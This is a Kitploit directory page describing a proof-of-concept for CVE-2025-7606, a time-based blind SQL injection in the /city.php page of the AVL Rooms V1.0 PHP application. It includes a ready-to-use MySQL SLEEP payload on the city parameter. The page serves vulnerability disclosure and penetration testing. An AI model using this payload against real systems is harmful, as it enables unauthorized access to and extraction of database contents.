Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-7606 — Proof-of-concept exploit for CVE-2025-7606: time-based blind SQL injection in code-projects AVL Rooms V1.0 /city.php. Includes payload for MySQL SLEEP-based extraction. | Kitploit
Tools/GitHubGitHub/sunhuihi666/cve-2025-7606
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsunhuihi666/cve-2025-7606

CVE-2025-7606

Proof-of-concept exploit for CVE-2025-7606: time-based blind SQL injection in code-projects AVL Rooms V1.0 /city.php. Includes payload for MySQL SLEEP-based extraction.

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-7606

code-projects AVL Rooms Project V1.0/city.php SQL injection

NAME OF AFFECTED PRODUCT(S)

AVL Rooms

Vendor Homepage

https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

submitter

dazhi

Vulnerable File

/city.php

VERSION(S)

V1.0

Software Link

https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

Payload:


city (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: city=1' AND (SELECT 5303 FROM (SELECT(SLEEP(5)))kuAW) AND 'FOfS'='FOfS&date=07/13/2025

Download Tool